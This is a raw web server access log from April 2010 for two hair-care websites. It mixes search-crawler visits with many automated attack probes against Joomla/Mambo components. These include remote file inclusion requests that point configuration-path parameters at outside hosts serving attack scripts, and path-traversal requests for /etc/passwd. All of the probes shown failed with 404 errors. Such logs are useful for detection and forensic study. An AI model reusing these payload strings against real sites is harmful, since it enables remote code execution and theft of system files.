203.115.131.17 - - [26/Apr/2010:04:16:36 -0700] "GET /logs/access.log//cgi-bin//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.115.131.17 - - [26/Apr/2010:04:16:36 -0700] "GET /cgi-bin//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.115.131.17 - - [26/Apr/2010:04:16:36 -0700] "GET /logs//cgi-bin//include/write.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:04:19:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14609 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:04:22:16 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:22:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:22:16 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:23:28 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:23:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:23:28 -0700] "GET /logs/access_100405.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:23:41 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:23:42 -0700] "GET /logs/access_100405.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:23:42 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [26/Apr/2010:04:24:07 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [26/Apr/2010:04:24:07 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.252.224.4 - - [26/Apr/2010:04:24:07 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:25:51 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:25:51 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:25:51 -0700] "GET /logs/scripts.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:27:24 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:04:27:24 -0700] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:04:27:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
78.110.50.139 - - [26/Apr/2010:04:27:34 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [26/Apr/2010:04:27:34 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [26/Apr/2010:04:27:34 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [26/Apr/2010:04:28:28 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [26/Apr/2010:04:28:28 -0700] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.110.50.139 - - [26/Apr/2010:04:28:28 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:28:29 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:28:29 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
204.15.190.163 - - [26/Apr/2010:04:28:29 -0700] "GET /logs/scripts.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:04:28:33 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 760051 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
66.252.224.4 - - [26/Apr/2010:04:28:48 -0700] "GET /logs/access_100308.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.104 - - [26/Apr/2010:04:28:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13843 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:04:31:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18906 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:04:31:58 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:04:31:58 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.190.163 - - [26/Apr/2010:04:31:58 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig.absolute.path=http://takesi.freewebhostx.com/fx29id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.252.224.4 - - [26/Apr/2010:04:32:05 -0700] "GET /logs/access_100419.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:04:40:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14278 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
123.30.181.5 - - [26/Apr/2010:04:41:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [26/Apr/2010:04:41:42 -0700] "GET /logs/access_100412.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [26/Apr/2010:04:41:42 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:04:44:43 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 2120251 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:04:44:53 -0700] "GET /logs/access_100419.log/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.107.48.3 - - [26/Apr/2010:04:47:16 -0700] "GET /logs/access_100419.log/forum//mambots/content/multithumb/multithumb.php?mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
123.30.181.5 - - [26/Apr/2010:04:48:28 -0700] "GET /logs/access_100419.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://www.sly8.com/sly8//bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:04:50:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4711 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:04:58:58 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13130 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:10 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:10 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:10 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:17 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:17 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:18 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:22 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:22 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:22 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:28 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:29 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:29 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:29 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:29 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.230.162.220 - - [26/Apr/2010:05:00:29 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://photokey.net/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [26/Apr/2010:05:00:33 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 3021819 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:05:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14273 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
92.240.42.10 - - [26/Apr/2010:05:08:44 -0700] "GET /index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:11:36 -0700] "GET /logs/access_100329.log//index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:11:37 -0700] "GET /index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:11:37 -0700] "GET /logs//index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:11:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14627 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
212.178.4.231 - - [26/Apr/2010:05:12:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.freehairsecrets.com"
212.178.4.231 - - [26/Apr/2010:05:12:36 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:05:13:24 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:13:24 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:13:24 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:14:11 -0700] "GET /logs/access_100329.log//index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:14:11 -0700] "GET /index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:14:11 -0700] "GET /logs//index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [26/Apr/2010:05:14:58 -0700] "GET /freehairsecretsphp/ HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
92.240.42.10 - - [26/Apr/2010:05:15:35 -0700] "GET /index2.php?option=com_sef&Itemid=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.245 - - [26/Apr/2010:05:15:41 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:05:15:50 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:15:50 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:15:51 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:16:20 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:16:20 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:16:21 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:16:21 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:05:16:22 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:05:16:22 -0700] "GET /logs/access_100419.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
77.92.94.85 - - [26/Apr/2010:05:16:22 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://77.92.94.85/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:16:29 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:16:33 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:17:04 -0700] "GET /logs/access_100419.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:17:12 -0700] "GET /logs/access_100419.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:17:14 -0700] "GET /logs/access_100419.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:18:22 -0700] "GET /logs/access_100412.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:18:22 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:18:22 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.152.66 - - [26/Apr/2010:05:19:12 -0700] "GET /logs/access_100419.log/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.221.63.33 - - [26/Apr/2010:05:19:13 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.221.63.33 - - [26/Apr/2010:05:19:13 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.221.63.33 - - [26/Apr/2010:05:19:13 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
66.244.236.248 - - [26/Apr/2010:05:19:38 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:19:38 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:19:38 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:19:43 -0700] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:19:43 -0700] "GET /logs/access_100412.log%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.244.236.248 - - [26/Apr/2010:05:19:43 -0700] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
